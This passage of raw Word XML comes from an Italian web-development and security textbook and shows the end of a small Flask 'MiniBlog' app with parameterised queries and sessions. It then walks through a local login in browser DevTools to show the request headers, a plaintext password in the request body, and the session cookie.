        <w:t xml:space="preserve">"/logout"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> logout():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    session.clear()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Avvio</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init_db()</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Sembra molto codice ma è in realtà compatto. Salva il file ed esegui:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python miniblog.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedi la bacheca vuota. Clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accedi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, entra con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario / mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pubblica un messaggio. Esci, rientra come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">giulia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pubblica un altro messaggio. Funziona.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa hai costruito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, con riferimenti ai concetti del capitolo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Routing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.12</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route("/")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route("/login")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ecc. associano URL a funzioni Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Metodi HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">): la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">home()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risponde a GET, la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pubblica()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risponde solo a POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Query parametriche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">): tutte le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(..., (...))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usano i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di concatenare. Stiamo già scrivendo codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non vulnerabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sessioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session["utente_id"] = riga[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">salva l’ID utente nella sessione;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session.get("utente_id")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo legge. Flask gestisce automaticamente cookie firmati per il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Template HTML dinamico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">render_template_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con i blocchi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{% if %}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{% for %}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Jinja2 genera HTML diverso a seconda dei dati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tabelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">messaggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">foreign key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per legare ogni messaggio al suo autore.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="esplora-con-i-devtools"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esplora con i DevTools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso la parte più istruttiva. Mantenendo MiniBlog in esecuzione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser su MiniBlog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DevTools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(F12). Vai sulla scheda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spunta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Preserve log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(così non si svuota a ogni navigazione).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fai login come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel pannello Network vedrai apparire una richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cliccaci sopra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si apre un sottopannello con tutti i dettagli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DevTools di Chrome con la richiesta POST /login selezionata, scheda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3099206"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_10_DevTools_di_Chrome_con_la_richiesta_POST_login_selezionata_s.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3099206"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esplora le schede:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedi gli header che il browser ha inviato (Host, User-Agent, Content-Type, Cookie…) e gli header della risposta (Set-Cookie, Content-Type, Server…). Cerca in particolare il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è il cookie di sessione che il server ti ha appena dato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedi il body della POST:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=mario&amp;password=mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mario, sei nudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la tua password è viaggiata in chiaro nel body. Su HTTP non cifrato, chiunque in mezzo l’avrebbe letta. Per questo in produzione serve HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedi che il server ha risposto con uno status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e un header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È un redirect: il browser ha automaticamente seguito il redirect e fatto una nuova GET su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso vai sulla scheda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in Chrome) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in Firefox), espandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cookies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, clicca sul tuo dominio (</w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Vedi il cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È una stringa apparentemente casuale: questo è esattamente il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">session ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che il tuo browser invia a ogni richiesta successiva, per farsi riconoscere come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scheda Application di Chrome con il cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di MiniBlog visibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3099206"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_11_scheda_Application_di_Chrome_con_il_cookie_session_di_MiniBl.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3099206"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai appena visto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dal vivo</w:t>
      </w:r>
      <w:r>
